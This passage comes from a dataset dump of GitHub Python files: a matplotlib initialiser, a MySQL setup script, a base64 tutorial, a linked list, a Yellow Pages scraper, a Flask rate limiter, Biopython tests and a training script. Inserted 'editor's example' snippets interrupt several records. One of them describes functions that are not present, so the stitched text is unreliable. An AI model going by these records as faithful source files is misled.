'profile')\nexcept AttributeError:\n\n def profile(func):\n return func\n\n\n__IS_INITIALIZED__ = False\n__WHO_INITIALIZED__ = None\n\n\nVERBOSE_MPLINIT = ut.get_argflag(('--verb-mpl', '--verbose'))\nTARGET_BACKEND = ut.get_argval(\n ('--mpl-backend', '--mplbe'), type_=str, default=os.environ.get('MPL_BACKEND', None)\n)\nFALLBACK_BACKEND = ut.get_argval(\n ('--mpl-fallback-backend', '--mplfbbe'), type_=str, default='agg'\n)\n\n\ndef print_all_backends():\n import matplotlib.rcsetup as rcsetup\n\n print(rcsetup.all_backends)\n valid_backends = [\n 'GTK',\n 'GTKAgg',\n 'GTKCairo',\n 'MacOSX',\n 'Qt4Agg',\n 'Qt5Agg',\n 'TkAgg',\n 'WX',\n 'WXAgg',\n 
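# --- editor's example (added) ---
# load_data() above clips every review to maxSeqLength ids and zero-pads the
# short ones so define_graph() always sees a [batch_size, 40] tensor. That
# fixed-shape contract, isolated:
import numpy as np

def to_fixed_length(ids, max_len=40):
    ids = np.asarray(ids[:max_len], dtype=int)                    # truncate
    return np.pad(ids, (0, max_len - len(ids)), mode='constant')  # zero-pad

row = to_fixed_length([7, 3, 99])
assert row.shape == (40,) and row[3:].sum() == 0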
'CocoaAgg',\n 'GTK3Cairo',\n 'GTK3Agg',\n 'WebAgg',\n 'nbAgg',\n 'agg',\n 'cairo',\n 'emf',\n 'gdk',\n 'pdf',\n 'pgf',\n 'ps',\n 'svg',\n 'template',\n ]\n del valid_backends\n\n\ndef get_pyqt():\n have_guitool = ut.check_module_installed('guitool')\n try:\n if have_guitool:\n from wbia.guitool import __PYQT__ as PyQt # NOQA\n\n pyqt_version = PyQt._internal.GUITOOL_PYQT_VERSION\n else:\n try:\n import PyQt5 as PyQt\n\n pyqt_version = 5\n except ImportError:\n import PyQt4 as PyQt\n\n pyqt_version = 4\n except ImportError:\n PyQt = None\n pyqt_version = None\n return PyQt, pyqt_version\n\n\ndef get_target_backend():\n if (\n not sys.platform.startswith('win32')\n and not sys.platform.startswith('darwin')\n and os.environ.get('DISPLAY', None) is None\n ):\n # Write to files if we cannot display\n # target_backend = 'PDF'\n target_backend = FALLBACK_BACKEND\n else:\n target_backend = TARGET_BACKEND\n if target_backend is None:\n PyQt, pyqt_version = get_pyqt()\n if pyqt_version is None:\n print(\n '[!plotttool] WARNING backend fallback to {}'.format(FALLBACK_BACKEND)\n )\n target_backend = FALLBACK_BACKEND\n elif pyqt_version == 4:\n target_backend = 'Qt4Agg'\n elif pyqt_version == 5:\n target_backend = 'Qt5Agg'\n else:\n raise ValueError('Unknown pyqt version {!r}'.format(pyqt_version))\n return target_backend\n\n\ndef _init_mpl_rcparams():\n import matplotlib as mpl\n from matplotlib import style\n\n # http://matplotlib.org/users/style_sheets.html\n nogg = ut.get_argflag('--nogg')\n if not nogg:\n style.use('ggplot')\n # style.use(['ggplot'])\n # print('style.available = %r' % (style.available,))\n # style.use(['bmh'])\n # style.use(['classic'])\n # import utool\n # utool.embed()\n # style.use(['ggplot', 'dark_background'])\n if ut.get_argflag('--notoolbar'):\n toolbar = 'None'\n else:\n toolbar = 'toolbar2'\n mpl.rcParams['toolbar'] = toolbar\n # mpl.rc('text', usetex=False)\n\n if ut.get_argflag('--usetex'):\n # mpl.rc('text', usetex=True)\n mpl.rcParams['text.usetex'] = True\n # matplotlib.rcParams['text.latex.preamble']=[r\"\\usepackage{amsmath}\"]\n mpl.rcParams['text.latex.unicode'] = True\n mpl_keypress_shortcuts = [\n key for key in mpl.rcParams.keys() if key.find('keymap') == 0\n ]\n for key in mpl_keypress_shortcuts:\n mpl.rcParams[key] = ''\n\n CUSTOM_GGPLOT = 1\n if CUSTOM_GGPLOT and not nogg:\n ggplot_style = style.library['ggplot'] # NOQA\n # print('ggplot_style = %r' % (ggplot_style,))\n custom_gg = {\n 'axes.axisbelow': True,\n # 'axes.edgecolor': 'white',\n 'axes.facecolor': '#E5E5E5',\n 'axes.edgecolor': 'none',\n # 'axes.facecolor': 'white',\n 'axes.grid': True,\n 'axes.labelcolor': '#555555',\n 'axes.labelsize': 'large',\n 'axes.linewidth': 1.0,\n 'axes.titlesize': 'x-large',\n 'figure.edgecolor': '0.50',\n 'figure.facecolor': 'white',\n 'font.size': 10.0,\n 'grid.color': 'white',\n 'grid.linestyle': '-',\n 'patch.antialiased': True,\n 'patch.edgecolor': '#EEEEEE',\n 'patch.facecolor': '#348ABD',\n 'patch.linewidth': 0.5,\n 'xtick.color': '#555555',\n 'xtick.direction': 'out',\n 'ytick.color': '#555555',\n 'ytick.direction': 'out',\n 'axes.prop_cycle': mpl.cycler(\n 'color',\n [\n '#E24A33',\n '#348ABD',\n '#988ED5',\n '#777777',\n '#FBC15E',\n '#8EBA42',\n '#FFB5B8',\n ],\n ),\n }\n mpl.rcParams.update(custom_gg)\n\n NICE_DARK_BG = False\n if NICE_DARK_BG:\n dark_style = {\n 'axes.edgecolor': 'white',\n 'axes.facecolor': 'black',\n 'axes.labelcolor': 'white',\n 'figure.edgecolor': 'black',\n 'figure.facecolor': 'black',\n 'grid.color': 'white',\n 'lines.color': 
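# --- editor's example (added) ---
# get_target_backend() above falls back to a non-interactive backend when no
# display is available. The headless test it relies on, in isolation:
import os
import sys

def is_headless():
    return (not sys.platform.startswith(('win32', 'darwin'))
            and os.environ.get('DISPLAY') is None)

print('headless:', is_headless())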
'white',\n 'patch.edgecolor': 'white',\n 'savefig.edgecolor': 'black',\n 'savefig.facecolor': 'black',\n 'text.color': 'white',\n 'xtick.color': 'white',\n 'ytick.color': 'white',\n }\n mpl.rcParams.update(dark_style)\n mpl.rcParams['figure.subplot.top'] = 0.8\n # mpl.rcParams['text'].usetex = False\n # for key in mpl_keypress_shortcuts:\n # print('%s = %s' % (key, mpl.rcParams[key]))\n # Disable mpl shortcuts\n # mpl.rcParams['toolbar'] = 'None'\n # mpl.rcParams['interactive'] = True\n\n # import matplotlib.pyplot as plt\n # plt.xkcd()\n\n\ndef _mpl_set_backend(target_backend):\n import matplotlib as mpl\n\n if ut.get_argflag('--leave-mpl-backend-alone'):\n print('[pt] LEAVE THE BACKEND ALONE !!! was specified')\n print('[pt] not changing mpl backend')\n else:\n # mpl.use(target_backend, force=True)\n mpl.use(target_backend, force=False)\n current_backend = mpl.get_backend()\n if not ut.QUIET and ut.VERBOSE:\n print('[pt] current backend is: %r' % current_backend)\n\n\ndef _init_mpl_mainprocess(verbose=VERBOSE_MPLINIT):\n global __IS_INITIALIZED__\n global __WHO_INITIALIZED__\n import matplotlib as mpl\n\n # mpl.interactive(True)\n current_backend = mpl.get_backend()\n target_backend = get_target_backend()\n if __IS_INITIALIZED__ is True:\n if verbose:\n print(\n '[!plottool] matplotlib has already been initialized. backend=%r'\n % current_backend\n )\n print('[!plottool] Initially initialized by %r' % __WHO_INITIALIZED__)\n print(\n '[!plottool] Trying to be init by %r'\n % (ut.get_caller_name(N=range(0, 5)))\n )\n return False\n __IS_INITIALIZED__ = True\n\n if verbose:\n print('[plottool] matplotlib initialized by %r' % __WHO_INITIALIZED__)\n __WHO_INITIALIZED__ = ut.get_caller_name(N=range(0, 5))\n if verbose:\n print('--- INIT MPL---')\n print('[pt] current backend is: %r' % current_backend)\n print('[pt] mpl.use(%r)' % target_backend)\n if current_backend != target_backend:\n _mpl_set_backend(target_backend)\n _init_mpl_rcparams()\n\n\n@profile\ndef init_matplotlib(verbose=VERBOSE_MPLINIT):\n if ut.in_main_process():\n PyQt, pyqt_version = get_pyqt()\n return _init_mpl_mainprocess(verbose=verbose)\n","repo_name":"WildMeOrg/wildbook-ia","sub_path":"wbia/plottool/__MPL_INIT__.py","file_name":"__MPL_INIT__.py","file_ext":"py","file_size_in_byte":8803,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"77"} +{"seq_id":"71229715449","text":"import mysql.connector\n\n'''\nDatabase creation in MySQL, Table creation in database named XML \n'''\n\ndb_connection = mysql.connector.connect(\n host=\"localhost\",\n user=\"admin\",\n password=\"admin\"\n)\n\ndb_cursor = db_connection.cursor()\ncreate_database_query = \"CREATE DATABASE IF NOT EXISTS XML\"\ndb_cursor.execute(create_database_query)\n\n# Table creation in XML database\ndb_cursor.execute(\"USE XML\")\n\ncreate_transaction_table_query = \"\"\"\nCREATE TABLE IF NOT EXISTS Transaction (\n TransactionID VARCHAR(255) PRIMARY KEY,\n BeginDateTime DATETIME,\n EndDateTime DATETIME\n)\n\"\"\"\ndb_cursor.execute(create_transaction_table_query)\n\n# Creating the 'RetailTransactions' table with a foreign key constraint on TransactionID\ncreate_table_query = \"\"\"\nCREATE TABLE IF NOT EXISTS RetailTransactions (\n Date DATETIME,\n StoreID INT,\n TotalItems DECIMAL(10, 2),\n TotalAmount DECIMAL(10, 2),\n TotalReceipts DECIMAL(10, 2),\n TransactionID VARCHAR(255),\n FOREIGN KEY (TransactionID) REFERENCES 
Transaction(TransactionID)\n)\n\"\"\"\ndb_cursor.execute(create_table_query)\n\ndb_cursor.close()\ndb_connection.close()\n","repo_name":"Pociejus/RelyITS_exercise","sub_path":"Create_DB.py","file_name":"Create_DB.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26832176314","text":"# base64 => made up of uppercase letters, lowercase letters, digits 0-9, and / and + -> 64 symbols\n# base64 turns bytes into a string, and turns the string back into bytes\n# base64 processes three bytes at a time -> encoded as 4 characters\n# base64-encoded data ends up slightly larger than the original\n\nimport base64\n\ns = \"我爱你\"\n# convert to bytes\nbs = s.encode(\"utf-8\")\nprint(bs)\n# convert to a base64 string\nb64_str = base64.b64encode(bs).decode()\n# b64_str = b64_str.decode() # this is already Unicode, no encoding needed\nprint(b64_str)\n\n# given a b64 string, recover the original bytes\ns = \"5oiR54ix5L2g\"\nbs = base64.b64decode(s)\nprint(bs)\n\n# what is a base64 string, essentially? bytes\n# in higher-level encryption logic, most of what you handle is bytes\n","repo_name":"wanghuiyt/LuffyCode","sub_path":"四期直播/18.JS逆向/6.聊聊base64.py","file_name":"6.聊聊base64.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29804747427","text":"class Node(object):\n def __init__(self, data):\n self.data = data\n self.next = None\n\n def __repr__(self):\n \"\"\"Return a string representation of this node.\"\"\"\n return 'Node({!r})'.format(self.data)\n\nclass LinkedList(object):\n \"\"\"Initialize this linked list and append the given items, if any.\"\"\"\n def __init__(self, items=None):\n self.head = None\n self.tail = None\n if items is not None:\n for item in items:\n self.append(item)\n\n def __str__(self):\n \"\"\"Return a formatted string representation of this linked list.\"\"\"\n items = ['({!r})'.format(item) for item in self.items()]\n return '[{}]'.format(' -> '.join(items))\n\n def __repr__(self):\n \"\"\"Return a string representation of this linked list.\"\"\"\n return 'LinkedList({!r})'.format(self.items())\n\n def items(self):\n \"\"\"Return a list (dynamic array) of all items in this linked list.\n Best and worst case running time: O(n) for n items in the list (length)\n because we always need to loop through all n nodes to get each item.\"\"\"\n items = [] # O(1) time to create empty list\n # Start at head node\n node = self.head # O(1) time to assign new variable\n # Loop until node is None, which is one node too far past tail\n while node is not None: # Always n iterations because no early return\n items.append(node.data) # O(1) time (on average) to append to list\n # Skip to next node to advance forward in linked list\n node = node.next # O(1) time to reassign variable\n # Now list contains items from all nodes\n return items # O(1) time to return list\n\n def is_empty(self):\n \"\"\"Return a boolean indicating whether this linked list is empty.\"\"\"\n return self.head is None\n\n def append(self,data):\n \"\"\"Add Node with data to the end of linked list and set to tail\"\"\"\n # setting tail and head \n if self.is_empty():\n self.head = self.tail = Node(data)\n print('added head')\n return True\n else:\n curr = self.head\n while curr.next:\n curr = curr.next\n self.tail = curr.next = Node(data)\n \n def prepend(self,data):\n \"\"\"Add a node to the beginning of the linked list and set it as the new head.\"\"\"
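# --- editor's example (added) ---
# Once Create_DB.py above has built the two tables, rows have to be inserted
# parent-first because RetailTransactions carries a foreign key to
# Transaction. A sketch with parameterized queries; the values are made up:
import mysql.connector

conn = mysql.connector.connect(host='localhost', user='admin',
                               password='admin', database='XML')
cur = conn.cursor()
cur.execute(
    "INSERT INTO Transaction (TransactionID, BeginDateTime, EndDateTime) "
    "VALUES (%s, %s, %s)",
    ('T-0001', '2023-01-01 10:00:00', '2023-01-01 10:05:00'))
cur.execute(
    "INSERT INTO RetailTransactions (Date, StoreID, TotalItems, TotalAmount, "
    "TotalReceipts, TransactionID) VALUES (%s, %s, %s, %s, %s, %s)",
    ('2023-01-01 10:05:00', 7, 3, 19.99, 1, 'T-0001'))
conn.commit()
cur.close()
conn.close()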
\n if self.head == None:\n self.head = Node(data)\n self.tail = self.head\n else:\n curr = self.head\n new = Node(data)\n new.next = curr\n curr.prev = new\n self.head = new\n\n def replace(self,item, quality):\n if self.head:\n curr = self.head\n while curr:\n if quality(curr.data):\n curr.data = item\n # always advance; otherwise a replacement that still\n # satisfies quality() would loop forever\n curr = curr.next\n else:\n return None\n \n\n def find(self, quality):\n curr = self.head\n if curr != None:\n while curr:\n if quality(curr.data):\n print(\"found {} at {}\".format(curr.data, curr))\n return curr.data\n else:\n curr = curr.next\n else:\n print(\"not found\")\n return None\n\n \n\n def delete(self,item):\n \"\"\"Delete a node based on its data value\"\"\"\n #Delete first node\n if self.head:\n prev = self.head\n if prev.data == item:\n self.head = prev.next\n #The other nodes\n else:\n prev = self.head\n curr = prev.next\n while curr.next:\n print(\"prev {} , cur {}\".format(prev.data, curr.data))\n if curr.data == item:\n prev.next = curr.next\n return \"deleted {}\".format(curr)\n else:\n prev = prev.next\n curr = prev.next\n print(curr.data)\n print(prev.data)\n if curr.data == item:\n self.tail = prev\n prev.next = None\n else:\n print(\"{} is not in the linkedlist\".format(item))\n raise ValueError\n else:\n raise ValueError\n\n def get_node(self, index):\n \"\"\"(Abstract). Get element based on index.\"\"\"\n if self.is_empty():\n return -1\n else:\n if index == 0:\n return self.head\n else:\n x = 0\n curr = self.head\n while x < index:\n if curr.next != None:\n print(curr.data)\n curr = curr.next\n x+=1\n else:\n print(\"index out of bounds\")\n return -2\n print(curr.data)\n return curr\n\n\n def length(self):\n \"\"\"Return the length of the list\"\"\"\n idx = 1\n if self.head == None:\n return 0\n else:\n curr = self.head\n while curr.next:\n curr = curr.next\n idx +=1\n return idx\n\ndef test_linked_list():\n ll = LinkedList()\n print('list: {}'.format(ll))\n\n print('\\nTesting append:')\n for item in ['A', 'B', 'C']:\n print('append({!r})'.format(item))\n ll.append(item)\n print('list: {}'.format(ll))\n\n print('head: {}'.format(ll.head))\n print('tail: {}'.format(ll.tail))\n print('length: {}'.format(ll.length()))\n\n # Enable this after implementing delete method\n delete_implemented = True\n if delete_implemented:\n print('\\nTesting delete:')\n for item in ['B', 'C', 'A']:\n print('delete({!r})'.format(item))\n ll.delete(item)\n print('list: {}'.format(ll))\n\n print('head: {}'.format(ll.head))\n print('tail: {}'.format(ll.tail))\n print('length: {}'.format(ll.length()))\n\n\nif __name__ == '__main__':\n test_linked_list()\n","repo_name":"ajboxjr/Tweet-Generator","sub_path":"class7/data-structure/linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":6554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72419697529","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport 
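# --- editor's example (added) ---
# find() and replace() in the LinkedList above take a predicate ("quality")
# rather than a raw value, so callers can match on any condition. Usage:
ll = LinkedList(['A', 'B', 'C'])
ll.find(lambda data: data == 'B')           # prints the match, returns 'B'
ll.replace('Z', lambda data: data == 'C')   # every 'C' becomes 'Z'
print(ll)                                   # [('A') -> ('B') -> ('Z')]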
os\n\n\nurl=\"https://www.yellowpages.com/search?search_terms=event+planners&geo_location_terms=Los+Angeles%2C+CA\"\nurl2=\"https://www.yellowpages.com/search?search_terms=event+planners&geo_location_terms=\"\nurl3=\"https://www.yellowpages.com/search?search_terms=event%20planners&geo_location_terms=\"\nheaders={\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36\"\n}\n#req=requests.get(url,headers=headers)\n# print(req.status_code)\n# print(req.request.headers)\n\nname=input(\"Enter the location name: \").replace(\" \",\"+\")\nstate=input(\"Enter the state abbreviation: \").upper()\n\n# raw string so the backslashes in the Windows path are not treated as escapes\nos.chdir(r\"D:\\Python\\Web Scraping\\Yellow Pages Scrape\")\n\ninfo=pd.DataFrame()\n\npages=int(input(\"Enter the number of pages you want to extract: \"))\nlink=None\ncount=0\nfor i in range(1,pages+1):\n try:\n if i>1:\n holding=[x+\"%20\" for x in name.split(\"+\")]\n first=\"\".join(holding[0:len(holding)-1])\n last=holding[len(holding)-1].split('%20')[0]+'%2C'+'%20'+state+\"&page=\"+str(i)\n link=url3+first+last\n #print(link)\n else:\n link=url2+name+\"%2C\"+\"+\"+state\n #print(link)\n except:\n print(\"Error has occurred\")\n \n req=requests.get(link,headers=headers)\n soup=BeautifulSoup(req.content,features=\"lxml\")\n try:\n #container=soup.find(\"div\",{\"class\":\"search-results organic\"})\n another=soup.find_all(\"div\",{\"class\":\"result\"})\n for sections in another:\n business_name=sections.find(\"a\",{\"class\":\"business-name\"}).text\n #print(business_name)\n category=sections.find(\"div\",{\"class\":\"categories\"}).a.text\n #print(category)\n business_years=sections.find(\"div\",{\"class\":\"years-in-business\"})\n if business_years!=None:\n business_years=business_years.text\n #print(business_years)\n else:\n business_years=\"None\"\n phone_no=sections.find(\"div\",{\"class\":\"info-section info-secondary\"}).div.text\n if phone_no==None:\n phone_no=\"None\"\n #count+=1\n info.loc[len(info),['Name', 'Contact', 'Category', 'Years in Business']] = [business_name, phone_no, category,business_years]\n except:\n print(\"Error when assigning value\")\n\n#print(\"Total count:\",count)\ninfo.to_csv(f'{name}.csv')\n \n\n\n \n ","repo_name":"kaziabdullahfuad/The-Yellow-Pages-Scrape","sub_path":"my_yellowscrape.py","file_name":"my_yellowscrape.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21347688706","text":"# Given a string S, remove the vowels 'a', 'e', 'i', 'o', and 'u' from it, and return the new string.\n# S consists of lowercase English letters only.\n# 1 <= S.length <= 1000\n\nclass Solution:\n def removeVowels(self, S: str) -> str:\n if len(S)==0:\n return S\n vowels=['a', 'e', 'i', 'o', 'u']\n for i in vowels:\n S = S.replace(i,'')\n \n return S\n \n # List all the lowercase vowels. 
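# --- editor's example (added) ---
# The scraper above hand-assembles '%20'/'%2C' escapes for page 2 and later.
# The standard library can build an equivalent query safely (it encodes
# spaces as '+', which yellowpages.com accepts just like '%20'):
from urllib.parse import urlencode

def search_url(terms, location, state, page=1):
    params = {'search_terms': terms,
              'geo_location_terms': '%s, %s' % (location, state)}
    if page > 1:
        params['page'] = page
    return 'https://www.yellowpages.com/search?' + urlencode(params)

print(search_url('event planners', 'Los Angeles', 'CA', page=2))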
Loop each item of these five vowels, if any item matches the exist vowels in the string, \n # replace them with empty element.\n \n # Runtime: 24 ms, faster than 85.71% of Python3 online submissions.\n # Memory Usage: 12.7 MB, less than 100.00% of Python3 online.\n","repo_name":"BaronMa/Leetcode","sub_path":"Algorithms/Remove Vowels from a String.py","file_name":"Remove Vowels from a String.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18590470985","text":"from __future__ import absolute_import\n\nimport logging\n\nfrom flask import Blueprint, request, abort\n\nfrom huskar_api import settings\nfrom huskar_api.extras.rate_limiter import (\n check_new_request, RateExceededError)\nfrom huskar_api.switch import switch, SWITCH_ENABLE_RATE_LIMITER\n\n\nbp = Blueprint('middlewares.rate_limit_ip', __name__)\nlogger = logging.getLogger(__name__)\n\n\n@bp.before_app_request\ndef check_rate_limit():\n if not switch.is_switched_on(SWITCH_ENABLE_RATE_LIMITER):\n return\n\n remote_addr = request.remote_addr\n config = get_limiter_config(settings.RATE_LIMITER_SETTINGS, remote_addr)\n if not config:\n return\n\n rate, capacity = config['rate'], config['capacity']\n try:\n check_new_request(remote_addr, rate, capacity)\n except RateExceededError:\n abort(429, 'Too Many Requests, the rate limit is {}/s'.format(rate))\n\n\ndef get_limiter_config(configs, remote_addr):\n if remote_addr in configs:\n return configs[remote_addr]\n if '__anonymous__' in configs:\n return configs['__anonymous__']\n return configs.get('__default__')\n","repo_name":"huskar-org/huskar","sub_path":"huskar_api/api/middlewares/rate_limit_ip.py","file_name":"rate_limit_ip.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"77"} +{"seq_id":"31863522838","text":"import os\nimport tempfile\nimport unittest\nfrom Bio import MissingExternalDependencyError\n\nimport Bio.Phylo as bp\nfrom Bio.Phylo import CDAO\n\ntry:\n from Bio.Phylo import CDAOIO\nexcept ImportError:\n raise MissingExternalDependencyError(\n \"Install RDFlib if you want to use the CDAO tree format.\"\n ) from None\n\n# Example CDAO files\ncdao_files = (\"test.cdao\",)\n\n# Temporary file name for Writer tests below\nDUMMY = tempfile.NamedTemporaryFile(delete=False).name\n\n\n# ---------------------------------------------------------\n# Parser tests\n\n\ndef _test_parse_factory(source):\n \"\"\"Generate a test method for parse()ing the given source.\n\n The generated function extracts each phylogenetic tree using the parse()\n function.\n \"\"\"\n filename = os.path.join(\"CDAO/\", source)\n\n def test_parse(self):\n trees = list(bp._io.parse(filename, \"cdao\"))\n\n test_parse.__doc__ = f\"Parse the phylogenies in {source}.\"\n return test_parse\n\n\ndef _test_write_factory(source):\n \"\"\"Test for serialization of objects to CDAO format.\n\n Modifies the globally defined filenames in order to run the other parser\n tests on files (re)generated by CDAOIO's own writer.\n \"\"\"\n filename = os.path.join(\"CDAO/\", source)\n\n def test_write(self):\n \"\"\"Parse, rewrite and retest an example file.\"\"\"\n with open(filename) as infile:\n t1 = next(CDAOIO.Parser(infile).parse())\n\n with open(DUMMY, \"w\") as outfile:\n CDAOIO.write([t1], outfile)\n with open(DUMMY) as infile:\n t2 = next(CDAOIO.Parser(infile).parse())\n\n for prop_name in (\"name\", \"branch_length\", 
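# --- editor's example (added) ---
# An equivalent one-pass alternative to the replace() loop above, using a
# translation table; same result in a single scan of S:
_DROP_VOWELS = str.maketrans('', '', 'aeiou')

def remove_vowels(s: str) -> str:
    return s.translate(_DROP_VOWELS)

assert remove_vowels('leetcodeisacommunityforcoders') == 'ltcdscmmntyfrcdrs'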
\"confidence\"):\n p1 = [getattr(n, prop_name) for n in t1.get_terminals()]\n p2 = [getattr(n, prop_name) for n in t2.get_terminals()]\n if p1 == p2:\n pass\n else:\n # Can't sort lists with None on Python 3 ...\n self.assertNotIn(None, p1, f\"Bad input values for {prop_name}: {p1!r}\")\n self.assertNotIn(None, p2, f\"Bad output values for {prop_name}: {p2!r}\")\n self.assertEqual(sorted(p1), sorted(p2))\n\n test_write.__doc__ = f\"Write and re-parse the phylogenies in {source}.\"\n return test_write\n\n\nclass ParseTests(unittest.TestCase):\n \"\"\"Tests for proper parsing of example CDAO files.\"\"\"\n\n\nfor n, ex in enumerate(cdao_files):\n parse_test = _test_parse_factory(ex)\n parse_test.__name__ = f\"test_parse_{n}\"\n setattr(ParseTests, parse_test.__name__, parse_test)\n\n\nclass WriterTests(unittest.TestCase):\n pass\n\n\nfor n, ex in enumerate(cdao_files):\n write_test = _test_write_factory(ex)\n write_test.__name__ = f\"test_write_{n}\"\n setattr(WriterTests, write_test.__name__, write_test)\n\n\nif __name__ == \"__main__\":\n runner = unittest.TextTestRunner(verbosity=2)\n unittest.main(testRunner=runner)\n # Clean up the temporary file\n if os.path.exists(DUMMY):\n os.remove(DUMMY)\n","repo_name":"biopython/biopython","sub_path":"Tests/test_Phylo_CDAO.py","file_name":"test_Phylo_CDAO.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":3852,"dataset":"github-code","pt":"77"} +{"seq_id":"4183581432","text":"from data import DataLoader,BatchX\nfrom match import PIXNETNET\nimport pickle as pkl\nfrom train import Trainer,loss_function\nfrom torch import optim\nfrom evaluate import Evaluator\nimport os,argparse\nimport torch\n# load configuration\n# load data\n# build model\n# train\n# evaluate\n# save restore\n\n\ndef parse():\n parser = argparse.ArgumentParser(description='PIXNET...')\n\n\n parser.add_argument('mode',default=\"test\")\n parser.add_argument('-bs', '--batch_size', help='generate data',default=64,type=int)\n parser.add_argument('-en', '--epoch_num', help='generate data',default=100,type=int)\n parser.add_argument('-cpp', '--checkpoint_path', help='generate data',default=None)\n \n parser.add_argument('-lr', '--lr',default=None)\n\n # for decoding\n parser.add_argument('-r','--save_root',default='./tmp')\n\n #training path\n parser.add_argument('-tp','--train_path',default='20.txt')\n parser.add_argument('-vp','--val_path',default='20.txt')\n parser.add_argument('-ep','--eval_path',default='20.txt')\n\n parser.add_argument('-voc','--voc_path',default=None)\n \n args = parser.parse_args()\n return args\nprint('start')\narg = parse()\nprint('mode is %s'%(arg.mode))\n\nbatch_size = arg.batch_size\nepoch_num = arg.epoch_num\nsave_root_dir = arg.save_root\nif not os.path.exists(save_root_dir):\n os.makedirs(save_root_dir)\n\n#if arg.mode == 'test':\n# assert arg.voc_path is not None\n\nvocab = None\nif arg.voc_path is not None:\n with open(arg.voc_path,'rb') as f:\n vocab = pkl.load(f)\n\nif arg.mode == 'train':\n train_loader = DataLoader(vocab)\n train_loader.load_all(arg.train_path,batch_size)\n train_batch = train_loader.batch_data \n vocab = train_loader.vocab\n val_loader = DataLoader(vocab)\n val_loader.load_all(arg.val_path,batch_size)\n val_batch = val_loader.batch_data \n#elif arg.mode == 'test':\n# eval_loader = DataLoader(vocab)\n# eval_loader.load_all(arg.eval_path,batch_size)\n# eval_batch = eval_loader.batch_data \n# vocab = eval_loader.vocab\n\nembedding_dim,title_gru_units,response_gru_units = 
200,128,256\nhyper_parameters = (vocab,embedding_dim,title_gru_units,\\\n response_gru_units) \n\nif arg.checkpoint_path is not None:\n checkpoint = torch.load(arg.checkpoint_path)\n if 'model_hyper' in checkpoint:\n hyper_parameters = checkpoint['model_hyper']\n net = PIXNETNET(*hyper_parameters)\n net.load_state_dict(checkpoint['model'])\n optimizer = optim.Adam(net.parameters())\n optimizer.load_state_dict(checkpoint['optimzer'])\nelse:\n net = PIXNETNET(*hyper_parameters)\n if arg.lr is not None:\n optimizer = optim.Adam(net.parameters(),lr=arg.lr)\n else:\n optimizer = optim.Adam(net.parameters())\n\ndef get_X_y(batch_data):\n batch_label,batch_title,batch_comment = batch_data\n X = BatchX(batch_title,batch_comment)\n y = batch_label\n return X,y\n\nif arg.mode == 'train':\n train_X,train_y = get_X_y(train_batch)\n val_X,val_y = get_X_y(val_batch)\n\n trainer = Trainer(net,optimizer)\n trainer.train(epoch_num,train_X,train_y ,val_X,val_y,save_every = 10,\\\n save_dir='%s/model'%(save_root_dir),evaluate_every=10)\n#elif arg.mode == 'test':\n# print('evaluate form %s'%(arg.eval_path))\n# eva_X,eva_y = get_X_y(eval_batch)\n# evaluator = Evaluator(net)\n# loss,accu = evaluator.evaluate(eva_X,eva_y,loss_function)\n# print('loss,accu --> (%.3f %.3f)'%(loss,accu))\n","repo_name":"kumiko-oreyome/DISA_FINAL_PIXNET_PROJECT","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15993692867","text":"from sqlalchemy import or_\nfrom flask import current_app\n\nfrom models import db\nfrom models.companies import Companies\nfrom validators.company import CompanyPostSchema, CompanyDeleteSchema\nfrom utils.common import tag_converter\n\n\nclass CompanyInternalService(object):\n \"\"\"\n Company Internal Service Logic Class\n -> CompanyInternalService(compnay_name, tags)\n \"\"\"\n def __init__(self, param: dict = None, body: dict = None):\n self._param = param\n self._body = body\n\n def __repr__(self):\n return f\"self._param : {self._param} self._body : {self._body}\"\n\n def validate_param(self) -> (bool, bool):\n \"\"\"\n Validate [DELETE] /company/tags query string value\n :return: boolean\n \"\"\"\n try:\n error = CompanyDeleteSchema().validate(data=self._param)\n if error:\n raise ValueError(error)\n\n except ValueError as e:\n current_app.logger.error(e)\n return False, e\n\n return True, True\n\n def validate_body(self) -> (bool, bool):\n \"\"\"\n Validate [POST] /company/tags body value\n :return: boolean\n \"\"\"\n try:\n error = CompanyPostSchema().validate(data=self._body)\n if error:\n raise ValueError(error)\n\n except ValueError as e:\n current_app.logger.error(e)\n return False, e\n\n return True, True\n\n def has_company_tags(self, company_name: str, company_tag: str) -> (bool or None, bool):\n \"\"\"\n check company has request tag name in database\n :return: boolean (True, False)\n \"\"\"\n\n try:\n row = Companies.query.filter(or_(Companies.company_ko == company_name,\n Companies.company_en == company_name,\n Companies.company_ja == company_name)).first()\n if not row:\n return None, None\n\n # Set ko, ja, en tags\n tags = row.tag_ko.split(\"|\") + row.tag_en.split(\"|\") + row.tag_ja.split(\"|\")\n\n # Already Exist tag\n if company_tag in tags:\n return True, True\n\n except Exception as e:\n current_app.logger.error(e)\n\n return False, True\n\n def create_company_tags(self) -> (bool or None, str):\n \"\"\"\n create company tags\n :return: 
